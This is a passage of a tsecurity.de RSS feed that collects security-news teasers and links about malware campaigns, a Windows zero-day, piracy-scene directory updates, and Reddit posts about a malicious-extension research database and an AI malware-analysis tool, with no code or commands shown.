<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ist Free to Play am Ende? Mit neuen Tricks versuchen Anbieter mehr Geld zu verdienen. Dieser Gastbeitrag beleuchtet das Pay2win-Konzept.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/gast-artikel/gaming-wie-das-pay2win-konzept-gute-spiele-kaputtmachen-kann-331648.html">Gaming: Wie das Pay2win-Konzept gute Spiele kaputtmachen kann</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Illegales IPTV: Nutzer fliegen oft erst Jahre später auf]]></title>
<description><![CDATA[Wer illegales IPTV nutzt, geht ein hohes Risiko ein. Ermittlungen führen oft erst Jahre später zu Strafverfahren gegen Nutzer.
Der Artikel Illegales IPTV: Nutzer fliegen oft erst Jahre später auf erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3681439/it+sicherheit/malware+trojaner+viren/illegales+iptv+nutzer+fliegen+oft+erst+jahre+spaeter+auf/</link>
<pubDate>Mon, 20 Jul 2026 16:49:22 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Wer illegales IPTV nutzt, geht ein hohes Risiko ein. Ermittlungen führen oft erst Jahre später zu Strafverfahren gegen Nutzer.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/iptv/illegales-iptv-nutzer-fliegen-oft-erst-nach-jahren-auf-331642.html">Illegales IPTV: Nutzer fliegen oft erst Jahre später auf</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TONResolver RAT Abuses TON Blockchain to Target Japan's Hotel Industry]]></title>
<description><![CDATA[2026-06-29 • Trend Micro
     • Yuya Sato
     • js.tonrat
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3681438/it+sicherheit/malware+trojaner+viren/tonresolver+rat+abuses+ton+blockchain+to+target+japans+hotel+industry/</link>
<pubDate>Mon, 20 Jul 2026 16:49:21 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-06-29 • Trend Micro
     • Yuya Sato
     • js.tonrat
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/a9940b01-2c5a-4aca-ac0f-76dfe16c0f38/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sequel to ChainVeil npm Malware Targets Vite Ecosystem]]></title>
<description><![CDATA[2026-07-14 • Checkmarx
     • Pavan Gudimalla
     • js.jadesnow
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3680487/it+sicherheit/malware+trojaner+viren/sequel+to+chainveil+npm+malware+targets+vite+ecosystem/</link>
<pubDate>Mon, 20 Jul 2026 09:17:55 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-14 • Checkmarx
     • Pavan Gudimalla
     • js.jadesnow
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/eda34ce1-9195-47f8-a5e9-c3d194121070/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChainVeil and ViteVenom are DPRK’s PolinRider Campaign]]></title>
<description><![CDATA[2026-07-17 • OpenSourceMalware
     • Jenn Gile
     • js.jadesnow
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3680486/it+sicherheit/malware+trojaner+viren/chainveil+and+vitevenom+are+dprks+polinrider+campaign/</link>
<pubDate>Mon, 20 Jul 2026 09:17:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-17 • OpenSourceMalware
     • Jenn Gile
     • js.jadesnow
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/aadad501-e911-4fc6-a35f-7463531046da/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New North Korean campaign uses fake coding interviews to steal developer credentials]]></title>
<description><![CDATA[2026-07-17 • Elastic
     • Daniel Stepanic
     • js.otter_cookie
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3680459/it+sicherheit/malware+trojaner+viren/new+north+korean+campaign+uses+fake+coding+interviews+to+steal+developer+credentials/</link>
<pubDate>Mon, 20 Jul 2026 09:03:42 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-17 • Elastic
     • Daniel Stepanic
     • js.otter_cookie
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/40546b50-1a62-4e60-9945-80d9ccb60212/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Serien-Downloads im Juli 2026]]></title>
<description><![CDATA[Hier ist unser Update für Serien-Downloads im Juli 2026. Welche Portale sind noch aktiv, welche sind zwischenzeitlich offline gegangen?
Der Artikel Serien-Downloads im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3679649/it+sicherheit/malware+trojaner+viren/serien-downloads+im+juli+2026/</link>
<pubDate>Sun, 19 Jul 2026 17:02:52 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hier ist unser Update für Serien-Downloads im Juli 2026. Welche Portale sind noch aktiv, welche sind zwischenzeitlich offline gegangen?</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/serien-downloads-im-juli-2026-331607.html">Serien-Downloads im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gemini CLI missbraucht: KI baut Botnetz in nur sechs Minuten]]></title>
<description><![CDATA[Trend Micro zeigt, wie ein Hacker Gemini CLI missbrauchte und mit KI ein Botnetz in nur sechs Minuten migrierte.
Der Artikel Gemini CLI missbraucht: KI baut Botnetz in nur sechs Minuten erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3679481/it+sicherheit/malware+trojaner+viren/gemini+cli+missbraucht+ki+baut+botnetz+in+nur+sechs+minuten/</link>
<pubDate>Sun, 19 Jul 2026 14:48:15 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Trend Micro zeigt, wie ein Hacker Gemini CLI missbrauchte und mit KI ein Botnetz in nur sechs Minuten migrierte.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/kuenstliche-intelligenz/gemini-cli-missbraucht-ki-baut-botnetz-in-sechs-minuten-331606.html">Gemini CLI missbraucht: KI baut Botnetz in nur sechs Minuten</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Usenet-Boards im Juli 2026]]></title>
<description><![CDATA[Welche deutschsprachigen Usenet-Boards sind noch aktiv im Juli 2026? Hier ist unser Update mit einem ausführlichen Kommentar zu jedem Forum.
Der Artikel Usenet-Boards im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3679120/it+sicherheit/malware+trojaner+viren/usenet-boards+im+juli+2026/</link>
<pubDate>Sun, 19 Jul 2026 10:17:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welche deutschsprachigen Usenet-Boards sind noch aktiv im Juli 2026? Hier ist unser Update mit einem ausführlichen Kommentar zu jedem Forum.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/usenet-boards-im-juli-2026-331575.html">Usenet-Boards im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[fake cloudfare rat]]></title>
<description><![CDATA[submitted by    /u/MarkTheBoy_YT   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3678732/it+sicherheit/malware+trojaner+viren/fake+cloudfare+rat/</link>
<pubDate>Sun, 19 Jul 2026 04:03:01 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/MarkTheBoy_YT"> /u/MarkTheBoy_YT </a> <br> <span><a href="https://www.reddit.com/r/antivirus/comments/1uzzaph/fake_cloudfare_rat/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uzzaxw/fake_cloudfare_rat/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Database of Malicious Browser Extensions continues to grow!]]></title>
<description><![CDATA[Hello everyone, A few months ago I shared my open database of malicious browser extensions. I'm happy to say it has now grown to **over 500 malicious CRX samples**. It started as a small research project, but it's continued to grow as I discover and collect more malicious extensions. My goal is t...]]></description>
<link>https://tsecurity.de/de/3678731/it+sicherheit/malware+trojaner+viren/database+of+malicious+browser+extensions+continues+to+grow/</link>
<pubDate>Sun, 19 Jul 2026 04:02:59 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello everyone,</p> <p>A few months ago I shared my open database of malicious browser extensions. I'm happy to say it has now grown to **over 500 malicious CRX samples**.</p> <p>It started as a small research project, but it's continued to grow as I discover and collect more malicious extensions. My goal is to make it a useful resource for researchers, students, and anyone interested in browser extension security.</p> <p>One thing I'm working on next is making the data easier to consume in other tools. At the moment I'm considering exposing it in formats such as:</p> <p>* JSON<br> * CSV</p> <p>I'm also thinking about adding things like an API or threat-intelligence style feeds if people think they'd be useful.</p> <p>I'd love to hear your thoughts:</p> <p>* What format would you actually use?<br> * Are there any security tools or platforms you'd like to integrate it with?<br> * Is there any metadata you'd find useful that I'm currently missing?</p> <p>Repository:<br> [<a href="https://github.com/GherardoFiori/MaliciousBrowserExtensions%5C%5D(https://github.com/GherardoFiori/MaliciousBrowserExtensions?utm%5C_source=chatgpt.com)">https://github.com/GherardoFiori/MaliciousBrowserExtensions\](https://github.com/GherardoFiori/MaliciousBrowserExtensions?utm\_source=chatgpt.com)</a></p> <p>**Please remember these are live malicious browser extensions. Handle them with care.**</p> <p>Project:<br> [<a href="https://exterminai.com/%5C%5D(https://exterminai.com/)">https://exterminai.com/\](https://exterminai.com/)</a></p> <p>Any feedback is appreciated. Thanks!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/ElBuio"> /u/ElBuio </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v04d6m/database_of_malicious_browser_extensions/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v04d6m/database_of_malicious_browser_extensions/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive: Neuer Windows-Zero-Day hebelt selbst vollständig gepatchte Systeme aus]]></title>
<description><![CDATA[LegacyHive ist ein neuer Windows-Zero-Day, der selbst vollständig gepatchte Systeme betrifft. Microsoft untersucht die Schwachstelle.
Der Artikel LegacyHive: Neuer Windows-Zero-Day hebelt selbst vollständig gepatchte Systeme aus erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3678006/it+sicherheit/malware+trojaner+viren/legacyhive+neuer+windows-zero-day+hebelt+selbst+vollstaendig+gepatchte+systeme+aus/</link>
<pubDate>Sat, 18 Jul 2026 14:48:13 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LegacyHive ist ein neuer Windows-Zero-Day, der selbst vollständig gepatchte Systeme betrifft. Microsoft untersucht die Schwachstelle.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/legacyhive-windows-zero-day-gepatchte-systeme-331579.html">LegacyHive: Neuer Windows-Zero-Day hebelt selbst vollständig gepatchte Systeme aus</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Warez-Verzeichnisse & Toplists im Juli 2026]]></title>
<description><![CDATA[Welche Warez-Verzeichnisse & Toplists sind im Juli 2026 noch aktiv? Wir haben uns einmal mehr für euch ausführlich im Internet umgeschaut.
Der Artikel Warez-Verzeichnisse & Toplists im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3677571/it+sicherheit/malware+trojaner+viren/warez-verzeichnisse+toplists+im+juli+2026/</link>
<pubDate>Sat, 18 Jul 2026 09:02:57 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welche Warez-Verzeichnisse &amp; Toplists sind im Juli 2026 noch aktiv? Wir haben uns einmal mehr für euch ausführlich im Internet umgeschaut.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/warez-verzeichnisse-toplists-im-juli-2026-331567.html">Warez-Verzeichnisse &amp; Toplists im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Börsen-Foren & Szene-Boards im Juli 2026]]></title>
<description><![CDATA[In welchen Börsen-Foren ist der Dateiaustausch aktiv? Welche lohnenswerten Szene-Boards gibt es sonst noch in Deutsch oder Englisch?
Der Artikel Börsen-Foren & Szene-Boards im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3676643/it+sicherheit/malware+trojaner+viren/boersen-foren+szene-boards+im+juli+2026/</link>
<pubDate>Fri, 17 Jul 2026 19:19:02 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In welchen Börsen-Foren ist der Dateiaustausch aktiv? Welche lohnenswerten Szene-Boards gibt es sonst noch in Deutsch oder Englisch?</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/boersen-foren-szene-boards-im-juli-2026-331558.html">Börsen-Foren &amp; Szene-Boards im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Smartphone-Diebstahl: Betrüger locken mit Fake-SMS in Phishing-Falle]]></title>
<description><![CDATA[Smartphone-Diebstahl im Urlaub: Mit Fake-SMS locken Kriminelle Opfer in eine Phishing-Falle. So schützt du Apple-ID und Google-Konto.
Der Artikel Smartphone-Diebstahl: Betrüger locken mit Fake-SMS in Phishing-Falle erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3676379/it+sicherheit/malware+trojaner+viren/smartphone-diebstahl+betrueger+locken+mit+fake-sms+in+phishing-falle/</link>
<pubDate>Fri, 17 Jul 2026 17:03:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Smartphone-Diebstahl im Urlaub: Mit Fake-SMS locken Kriminelle Opfer in eine Phishing-Falle. So schützt du Apple-ID und Google-Konto.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/smartphone-diebstahl-fake-sms-phishing-falle-331552.html">Smartphone-Diebstahl: Betrüger locken mit Fake-SMS in Phishing-Falle</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malware-Slop: Crypto Stealer Impersonating Polymarket Exposes Its Own Credentials]]></title>
<description><![CDATA[2026-07-12 • OX Security
     • Moshe Siman Tov Bustan
     • js.ottercandy
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3675436/it+sicherheit/malware+trojaner+viren/malware-slop+crypto+stealer+impersonating+polymarket+exposes+its+own+credentials/</link>
<pubDate>Fri, 17 Jul 2026 10:18:01 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-12 • OX Security
     • Moshe Siman Tov Bustan
     • js.ottercandy
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/3fa4a406-c8a4-4c5a-b23b-436405d16fec/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PolinRider Confirmed Footprint Grows 6.5x Since March]]></title>
<description><![CDATA[2026-07-15 • OpenSourceMalware
     • Paul McCarty
     • js.jadesnow
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3675435/it+sicherheit/malware+trojaner+viren/polinrider+confirmed+footprint+grows+65x+since+march/</link>
<pubDate>Fri, 17 Jul 2026 10:18:00 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-15 • OpenSourceMalware
     • Paul McCarty
     • js.jadesnow
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/fb0dc806-33b7-4c01-aef2-032cda1b8617/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Technical Resource: Comprehensive Guide to Manual Website Malware Removal]]></title>
<description><![CDATA[submitted by    /u/quttera-ltd   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3674904/it+sicherheit/malware+trojaner+viren/technical+resource+comprehensive+guide+to+manual+website+malware+removal/</link>
<pubDate>Fri, 17 Jul 2026 04:03:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/quttera-ltd"> /u/quttera-ltd </a> <br> <span><a href="https://www.reddit.com/r/u_quttera-ltd/comments/1ux41re/technical_resource_comprehensive_guide_to_manual/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uxucp1/technical_resource_comprehensive_guide_to_manual/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[20+ Hijacked Government Websites Became an Attack Channel: PhantomEnigma Investigation]]></title>
<description><![CDATA[submitted by    /u/ANYRUN-team   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3674903/it+sicherheit/malware+trojaner+viren/20+hijacked+government+websites+became+an+attack+channel+phantomenigma+investigation/</link>
<pubDate>Fri, 17 Jul 2026 04:03:04 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ANYRUN-team"> /u/ANYRUN-team </a> <br> <span><a href="https://any.run/cybersecurity-blog/phantomenigma-research/?utm_source=reddit">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uy2gml/20_hijacked_government_websites_became_an_attack/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Me and my friend are building an autonomous malware analysis platform]]></title>
<description><![CDATA[Hey all, We are building an autonomous malware analysis and reverse-engineering AI agent for security teams. https://www.embusa.ai/ The idea came from a recurring problem: when a suspicious file appears during an incident, we lack the time and sometimes the expertise to determine what it does, wh...]]></description>
<link>https://tsecurity.de/de/3674902/it+sicherheit/malware+trojaner+viren/me+and+my+friend+are+building+an+autonomous+malware+analysis+platform/</link>
<pubDate>Fri, 17 Jul 2026 04:03:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey all,</p> <p>We are building an autonomous malware analysis and reverse-engineering AI agent for security teams.</p> <p><a href="https://www.embusa.ai/">https://www.embusa.ai/</a></p> <p>The idea came from a recurring problem: when a suspicious file appears during an incident, we lack the time and sometimes the expertise to determine what it does, what it affected, and what we should do next.</p> <p>We are looking for feedback:</p> <p>A closed alpha will run very soon™, if you are interested to test it yourself, registrations are open.</p> <p>We also wrote a blog post showcasing the agent's abilities when we submit an unknown DLL and nothing else: <a href="https://www.embusa.ai/blog/embusa-analyst-takes-apart-a-live-backdoor-in-six-minutes-forty-five-seconds">https://www.embusa.ai/blog/embusa-analyst-takes-apart-a-live-backdoor-in-six-minutes-forty-five-seconds</a></p> <p>We'd love to hear your thoughts!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Live-Historian5745"> /u/Live-Historian5745 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uy9ztn/me_and_my_friend_are_building_an_autonomous/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uy9ztn/me_and_my_friend_are_building_an_autonomous/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Festival Ticket Scams]]></title>
<description><![CDATA[Author: Avast - Bewertung: 2x - Views:171 Get help spotting fake ticket sites this summer with AI scam protection 👀]]></description>
<link>https://tsecurity.de/de/3674603/it+sicherheit/malware+trojaner+viren/festival+ticket+scams/</link>
<pubDate>Thu, 16 Jul 2026 22:32:58 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 2x - Views:171 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/zvtllSd_fTc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Get help spotting fake ticket sites this summer with AI scam protection 👀<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scattered Spider: Live gestreamter Cyberangriff endet mit 5,5 Jahren Haft]]></title>
<description><![CDATA[Scattered Spider: Hacker-Duo erhält nach dem TfL-Cyberangriff 5,5 Jahre Haft. Millionen Datensätze gestohlen, Angriff sogar live gestreamt.
Der Artikel Scattered Spider: Live gestreamter Cyberangriff endet mit 5,5 Jahren Haft erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3674111/it+sicherheit/malware+trojaner+viren/scattered+spider+live+gestreamter+cyberangriff+endet+mit+55+jahren+haft/</link>
<pubDate>Thu, 16 Jul 2026 18:35:00 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Scattered Spider: Hacker-Duo erhält nach dem TfL-Cyberangriff 5,5 Jahre Haft. Millionen Datensätze gestohlen, Angriff sogar live gestreamt.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/cyberangriffe/scattered-spider-tfl-cyberangriff-331527.html">Scattered Spider: Live gestreamter Cyberangriff endet mit 5,5 Jahren Haft</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnionHop: Tool leitet Daten durch das Tor-Netzwerk]]></title>
<description><![CDATA[OnionHop für Linux, macOS und Windows ist ein Routing-Manager, der die Daten einzelner oder aller Programme über das Tor-Netzwerk leitet.
Der Artikel OnionHop: Tool leitet Daten durch das Tor-Netzwerk erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3673884/it+sicherheit/malware+trojaner+viren/onionhop+tool+leitet+daten+durch+das+tor-netzwerk/</link>
<pubDate>Thu, 16 Jul 2026 17:02:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OnionHop für Linux, macOS und Windows ist ein Routing-Manager, der die Daten einzelner oder aller Programme über das Tor-Netzwerk leitet.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/datenschutz/onionhop-tool-leitet-daten-durch-das-tor-netzwerk-331520.html">OnionHop: Tool leitet Daten durch das Tor-Netzwerk</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HelloNet campaign — new malicious modules launched through the ViPNet update system]]></title>
<description><![CDATA[We identified targeted infection attempts against large Russian organizations using the ViPNet update system (a software suite for creating secure networks).]]></description>
<link>https://tsecurity.de/de/3673843/it+sicherheit/malware+trojaner+viren/hellonet+campaign+-+new+malicious+modules+launched+through+the+vipnet+update+system/</link>
<pubDate>Thu, 16 Jul 2026 16:47:37 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We identified targeted infection attempts against large Russian organizations using the ViPNet update system (a software suite for creating secure networks).]]></content:encoded>
</item>
<item>
<title><![CDATA[Dodgy-Boxen: Anbieter illegaler Set-Top-Boxen erhalten Abmahnungen von Sky und Fact]]></title>
<description><![CDATA[Zehn irische Anbieter von „Dodgy-Boxen“ haben von Sky und der Organisation FACT Post erhalten. Sie sollen sofort ihre Tätigkeit einstellen.
Der Artikel Dodgy-Boxen: Anbieter illegaler Set-Top-Boxen erhalten Abmahnungen von Sky und Fact erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3672850/it+sicherheit/malware+trojaner+viren/dodgy-boxen+anbieter+illegaler+set-top-boxen+erhalten+abmahnungen+von+sky+und+fact/</link>
<pubDate>Thu, 16 Jul 2026 10:48:08 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Zehn irische Anbieter von „Dodgy-Boxen“ haben von Sky und der Organisation FACT Post erhalten. Sie sollen sofort ihre Tätigkeit einstellen.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/rechtssachen/dodgy-boxen-anbieter-illegaler-set-top-boxen-erhalten-abmahnungen-von-sky-und-fact-331516.html">Dodgy-Boxen: Anbieter illegaler Set-Top-Boxen erhalten Abmahnungen von Sky und Fact</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Photo ZIP campaign targeting hospitality industry delivers Node.js implant for persistent access]]></title>
<description><![CDATA[2026-06-25 • Microsoft Security
     • Microsoft Defender Experts, Microsoft Defender Security Research Team, Parth Jomadkar
     • js.tonrat
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3672754/it+sicherheit/malware+trojaner+viren/photo+zip+campaign+targeting+hospitality+industry+delivers+nodejs+implant+for+persistent+access/</link>
<pubDate>Thu, 16 Jul 2026 10:03:28 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-06-25 • Microsoft Security
     • Microsoft Defender Experts, Microsoft Defender Security Research Team, Parth Jomadkar
     • js.tonrat
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/347b58ce-bf5a-4305-b175-9acddcbae735/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Burnt by Burgers: Highlighting Void Blizzard’s Russian State Links]]></title>
<description><![CDATA[2026-07-14 • Ctrl-Alt-Intel
     • Ctrl-Alt-Intel
    
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3672753/it+sicherheit/malware+trojaner+viren/burnt+by+burgers+highlighting+void+blizzards+russian+state+links/</link>
<pubDate>Thu, 16 Jul 2026 10:03:27 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-14 • Ctrl-Alt-Intel
     • Ctrl-Alt-Intel
    
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/b4d21356-cab4-4725-a72a-949da4a1a4aa/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Daxin Returns: Stealthy Malware Resurfaces in Taiwan Alongside a New Backdoor]]></title>
<description><![CDATA[2026-07-15 • Symantec
     • Threat Hunter Team
     • win.daxin
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3672752/it+sicherheit/malware+trojaner+viren/daxin+returns+stealthy+malware+resurfaces+in+taiwan+alongside+a+new+backdoor/</link>
<pubDate>Thu, 16 Jul 2026 10:03:26 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-15 • Symantec
     • Threat Hunter Team
     • win.daxin
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/2e43fe9e-30e3-4540-95b4-f26bf1d38cc8/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing CylindricalCanine: The GoldenEyeDog subgroup responsible for the April DigiCert incident]]></title>
<description><![CDATA[2026-07-15 • Expel
     • AARON WALTON
